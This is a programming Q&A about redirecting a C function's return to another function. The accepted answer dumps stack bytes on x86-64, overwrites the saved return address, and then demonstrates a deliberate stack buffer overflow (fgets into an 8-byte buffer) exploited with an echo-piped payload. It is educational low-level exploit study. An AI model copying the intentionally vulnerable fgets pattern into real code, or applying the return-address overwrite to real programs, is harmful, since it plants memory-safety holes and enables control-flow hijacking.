# Buffer overflow , stack pointer manipulation using GDB

Tags: c, gdb

I have a simple problem in c which may be solved using GDB, but I am not able to solved it.

We have a main() function which calls another function, say A(). When function A() executes and returns, instead of returning to main() it goes to another function, say B().

I don't know what to do in A() so that return address will change.

Comment: Please show the code you have tried so far to solve the problem.

Comment: Sorry, your question is not yet clear to me. Do you have a function `A()` which returns to `B()` instead of `main()` (due to a possible buffer overflow)? Or do you want to write a function `A()` which returns to `B()` instead of `main()` forced by a buffer overflow?

Comment: #include<stdio.h>
#include<stdlib.h>
void A(){
printf("This is A\n");
char a[5]="ZXCVB";
int *x;
x=a + 12;
(*x)+=7;
}
void C(){
printf("\nThis is C, hence stack pointer changes\n");
exit(0);
}
void main(){
printf("\nMain Run\n");
A();
printf("\nAgain Main Run\n");
}

Answer (score 1, accepted):

Assuming, the OP wants to force a return from `A()` to `B()` instead of to `main()` from where `A()` was called before...

I always believed to know how this might happen but never tried by myself. So, I couldn't resist to fiddle a bit.

Manipulation of return can hardly be done portable as it exploits facts of the generated code which may depend on compiler version, compiler settings, platform, and whatever.

At first, I tried to find out some details about **coliru** which I planned to use for fiddling:

```
#include <stdio.h>

int main()
{
  printf("sizeof (void*): %d\n", sizeof (void*));
  printf("sizeof (void*) == sizeof (void(*)()): %s\n",
    sizeof (void*) == sizeof (void(*)()) ? "yes" : "no");
  return 0;
}
```

Output:

```
gcc (GCC) 8.2.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

sizeof (void*): 8
sizeof (void*) == sizeof (void(*)()): yes
```

<kbd>[**Live Demo on coliru**](http://coliru.stacked-crooked.com/a/1aa51f06ea7ac84c)</kbd>

Next, I made a minimal sample to get an impression about the code which will be generated:

Source code:

```
#include <stdio.h>

void B()
{
  puts("in B()");
}

void A()
{
  puts("in A()");
}

int main()
{
  puts("call A():");
  A();
  return 0;
}
```

Compiled with `x86-64 gcc 8.2` and `-O0`:

```
.LC0:
        .string "in B()"
B:
        push    rbp
        mov     rbp, rsp
        mov     edi, OFFSET FLAT:.LC0
        call    puts
        nop
        pop     rbp
        ret
.LC1:
        .string "in A()"
A:
        push    rbp
        mov     rbp, rsp
        mov     edi, OFFSET FLAT:.LC1
        call    puts
        nop
        pop     rbp
        ret
.LC2:
        .string "call A():"
main:
        push    rbp
        mov     rbp, rsp
        mov     edi, OFFSET FLAT:.LC2
        call    puts
        mov     eax, 0
        call    A
        mov     eax, 0
        pop     rbp
        ret
```

<kbd>[**Live Explore on godbolt**](https://gcc.godbolt.org/z/wKJAnN)</kbd>

On Intel x86/x64:

- `call` stores the return address on stack before jumping to the given address
- `ret` pops the return address from stack into PC reg. again.

(Other CPUs might do this differently.)

Additionally, the

```
        push    rbp
        mov     rbp, rsp
```

is interesting as `push` stores something on stack as well while `rsp` is the register with current stack top address and `rbp` its companion which is usually used for relative addressing of local variables.

So, a local variable (which is addressed relative to `rbp` – if not optimized) might have a fix offset to the return address on stack.

So, I added some code to the first sample to come in touch:

```
#include <stdio.h>

typedef unsigned char byte;

void B()
{
  puts("in B()"); 
}

void A()
{
  puts("in A()");
  char buffer[8] = { 0x00, 0xde, 0xad, 0xbe, 0xef, 0x4a, 0x11, 0x00 };
  byte *pI = (byte*)buffer;
  // dump some bytes from stack
  for (int i = 0; i < 64; ++i) {
    if (!(i % 8)) printf("%p: (+%2d)", pI + i, i);
    printf(" %02x", pI[i]);
    if (i % 8 == 7) putchar('\n');
  }
}

int main()
{
  printf("&main(): %p, &A(): %p, &B(): %p\n", (void*)&main, (void*)&A, (void*)&B);
  puts("call A():");
  A();
  return 0;
}
```

Output:

```
&main(): 0x400613, &A(): 0x400553, &B(): 0x400542
call A():
in A()
0x7ffcdedc9738: (+ 0) 00 de ad be ef 4a 11 00
0x7ffcdedc9740: (+ 8) 38 97 dc de fc 7f 00 00
0x7ffcdedc9748: (+16) 60 97 dc de 14 00 00 00
0x7ffcdedc9750: (+24) 60 97 dc de fc 7f 00 00
0x7ffcdedc9758: (+32) 49 06 40 00 00 00 00 00
0x7ffcdedc9760: (+40) 50 06 40 00 00 00 00 00
0x7ffcdedc9768: (+48) 30 48 4a f3 3e 7f 00 00
0x7ffcdedc9770: (+56) 00 00 00 00 00 00 00 00
```

<kbd>[**Live Demo on coliru**](http://coliru.stacked-crooked.com/a/e591f5fd32b4b915)</kbd>
This is what I read from this:

```
0x7ffcdedc9738: (+ 0) 00 de ad be ef 4a 11 00 # local var. buffer
0x7ffcdedc9740: (+ 8) 38 97 dc de fc 7f 00 00 # local var. pI (with address of buffer)
0x7ffcdedc9748: (+16) 60 97 dc de 14 00 00 00 # local var. i (4 bytes)
0x7ffcdedc9750: (+24) 60 97 dc de fc 7f 00 00 # pushed rbp
0x7ffcdedc9758: (+32) 49 06 40 00 00 00 00 00 # 0x400649 <- Aha!
```

`0x400649` is an address which is slightly higher than the address of `main()` (`0x400613`). Considering, that there was some code in `main()` prior the call of `A()` this makes perfectly sense.

So, if I want to manipulate the return address this has to happen at `pI + 32`:

```
#include <stdio.h>
#include <stdlib.h>

typedef unsigned char byte;

void B()
{
  puts("in B()"); 
  exit(0);
}

void A()
{
  puts("in A()");
  char buffer[8] = { 0x00, 0xde, 0xad, 0xbe, 0xef, 0x4a, 0x11, 0x00 };
  byte *pI = (byte*)buffer;
  // dump some bytes from stack
  for (int i = 0; i < 64; ++i) {
    if (!(i % 8)) printf("%p: (+%2d)", pI + i, i);
    printf(" %02x", pI[i]);
    if (i % 8 == 7) putchar('\n');
  }
  printf("Possible candidate for ret address: %p\n", *(void**)(pI + 32));
  *(void**)(pI + 32) = (byte*)&B;
}

int main()
{
  printf("&main(): %p, &A(): %p, &B(): %p\n", (void*)&main, (void*)&A, (void*)&B);
  puts("call A():");
  A();
  return 0;
}
```

I.e. I "patch" the address of function `B()` as the return address into the stack.

Output:

```
&main(): 0x400696, &A(): 0x4005aa, &B(): 0x400592
call A():
in A()
0x7fffe0eb0858: (+ 0) 00 de ad be ef 4a 11 00
0x7fffe0eb0860: (+ 8) 58 08 eb e0 ff 7f 00 00
0x7fffe0eb0868: (+16) 80 08 eb e0 14 00 00 00
0x7fffe0eb0870: (+24) 80 08 eb e0 ff 7f 00 00
0x7fffe0eb0878: (+32) cc 06 40 00 00 00 00 00
0x7fffe0eb0880: (+40) e0 06 40 00 00 00 00 00
0x7fffe0eb0888: (+48) 30 c8 41 84 42 7f 00 00
0x7fffe0eb0890: (+56) 00 00 00 00 00 00 00 00
Possible candidate for ret address: 0x4006cc
in B()
```

<kbd>[**Live Demo on coliru**](http://coliru.stacked-crooked.com/a/a1ec067ce9de4a75)</kbd>

Et voilà: **`in B()`**.

Instead of assigning the address directly, the same could be achieved by storing a string with at least 40 `char`s into `buffer` (only 8 `char`s capacity):

```
#include <stdio.h>
#include <stdlib.h>

typedef unsigned char byte;

void B()
{
  puts("in B()"); 
  exit(0);
}

void A()
{
  puts("in A()");
  char buffer[8] = { 0x00, 0xde, 0xad, 0xbe, 0xef, 0x4a, 0x11, 0x00 };
  byte *pI = (byte*)buffer;
  // dump some bytes from stack
  for (int i = 0; i < 64; ++i) {
    if (!(i % 8)) printf("%p: (+%2d)", pI + i, i);
    printf(" %02x", pI[i]);
    if (i % 8 == 7) putchar('\n');
  }
  // provoke buffer overflow vulnerability
  printf("Input: "); fflush(stdout);
  fgets(buffer, 40, stdin); // <- intentionally wrong use
  // show result
  putchar('\n');
}

int main()
{
  printf("&main(): %p, &A(): %p, &B(): %p\n", (void*)&main, (void*)&A, (void*)&B);
  puts("call A():");
  A();
  return 0;
}
```

Compiled and executed with:

```
$ gcc -std=c11 -O0 main.c
$ echo -e "                                \xa2\x06\x40\0\0\0\0\0" | ./a.out
```

To input the exact sequence of bytes by keyboard might be a bit difficult. Copy/paste might work. I used `echo` and redirection to keep things simple.

Output:

```
&main(): 0x4007ba, &A(): 0x4006ba, &B(): 0x4006a2
call A():
in A()
0x7ffd1700bac8: (+ 0) 00 de ad be ef 4a 11 00
0x7ffd1700bad0: (+ 8) c8 ba 00 17 fd 7f 00 00
0x7ffd1700bad8: (+16) f0 ba 00 17 14 00 00 00
0x7ffd1700bae0: (+24) f0 ba 00 17 fd 7f 00 00
0x7ffd1700bae8: (+32) f0 07 40 00 00 00 00 00
0x7ffd1700baf0: (+40) 00 08 40 00 00 00 00 00
0x7ffd1700baf8: (+48) 30 48 37 0f 5b 7f 00 00
0x7ffd1700bb00: (+56) 00 00 00 00 00 00 00 00
Input: 
in B()
```

<kbd>[**Live Demo on coliru**](http://coliru.stacked-crooked.com/a/e1baa79a0c08787a)</kbd>

Please, note that the input of 32 spaces (to align the return address `"\xa2\x06\x40\0\0\0\0\0"` to the intended offset) "destroys" all the internals of `A()` which are stored in this range. This might have fatal consequences for the stability of the process but, eventually, it's intact enough to reach `B()` and report that to console.